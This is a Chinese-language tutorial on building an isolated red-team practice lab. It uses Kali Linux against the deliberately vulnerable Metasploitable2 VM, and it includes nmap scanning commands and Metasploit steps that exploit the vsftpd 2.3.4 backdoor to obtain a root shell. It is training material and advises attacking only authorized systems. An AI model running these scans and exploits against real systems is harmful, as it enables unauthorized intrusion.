Linux网络红队演练配置（从零开始搭建红队渗透测试环境）

二、准备工作

你需要以下基础组件：

• 一台运行 Linux 的主机（推荐 Ubuntu 20.04/22.04 或 Kali Linux）
• VirtualBox 或 VMware（用于创建隔离的靶机）
• 网络知识基础（如 IP 地址、子网、端口等）
• 基本的命令行操作能力

三、搭建红队演练环境

我们将使用 Kali Linux 作为攻击机，Metasploitable2 作为靶机。

步骤 1：安装 Kali Linux（攻击机）

你可以直接在物理机安装，也可以在虚拟机中运行。官方 ISO 镜像可从 Kali 官网下载。

步骤 2：下载并启动 Metasploitable2（靶机）

Metasploitable2 是一个故意包含大量漏洞的 Linux 虚拟机，非常适合练习。网络安全实战就从这里开始！

下载地址：SourceForge - Metasploitable2

步骤 3：配置网络模式

为确保攻击机能与靶机通信，请将两台虚拟机设置为 Host-only 或 NAT Network 模式（避免影响真实网络）。

在 VirtualBox 中操作如下：

# 查看 Kali 的 IP 地址ip a# 查看 Metasploitable2 的 IP（通常为 192.168.56.101）# 若未自动获取，可手动设置静态 IPsudo ifconfig eth0 192.168.56.102 netmask 255.255.255.0  

四、执行一次简单渗透测试

现在我们用 Kali 对 Metasploitable2 进行基础扫描和利用。

1. 主机发现

nmap -sn 192.168.56.0/24  

2. 端口与服务扫描

nmap -sV -A 192.168.56.101  

3. 利用 vsftpd 后门（Metasploitable2 特有漏洞）

msfconsoleuse exploit/unix/ftp/vsftpd_234_backdoorset RHOSTS 192.168.56.101exploit  

如果成功，你将获得一个 root shell！这正是 Linux安全加固前必须了解的风险。

五、安全提醒

⚠️ 请务必在隔离的实验环境中进行演练，切勿对非授权系统发起攻击。红队演练的目的是提升防御能力，而非破坏。

六、总结

通过本教程，你已经掌握了如何搭建一个基础的 Linux网络红队演练环境，并完成了首次渗透测试。后续可学习 Web 漏洞（如 DVWA）、内网横向移动、权限提升等进阶内容。

记住：真正的安全，始于理解攻击。